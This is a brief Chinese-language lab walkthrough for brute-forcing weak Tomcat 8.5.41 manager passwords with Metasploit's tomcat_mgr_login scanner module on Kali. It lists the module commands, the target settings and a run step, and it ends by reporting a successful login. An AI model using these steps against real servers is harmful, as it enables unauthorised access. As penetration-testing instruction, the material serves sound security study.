测试环境:
Apache Tomcat/8.5.41
利用kali 里面的msf 进行爆破弱口令
运行命令查找关于 tomcat 的辅助模块 msf5 > search tomcat
找到需要的功能模块 auxiliary/scanner/http/tomcat_mgr_login
进入模块 use auxiliary/scanner/http/tomcat_mgr_login
开始配置 IP地址,端口号
set RHOSTS ip set RPORT 端口号
配置完成执行命令 show options 查看有没有IP 端口有没有配置正确
执行命令 run 开始爆破
成功爆破登录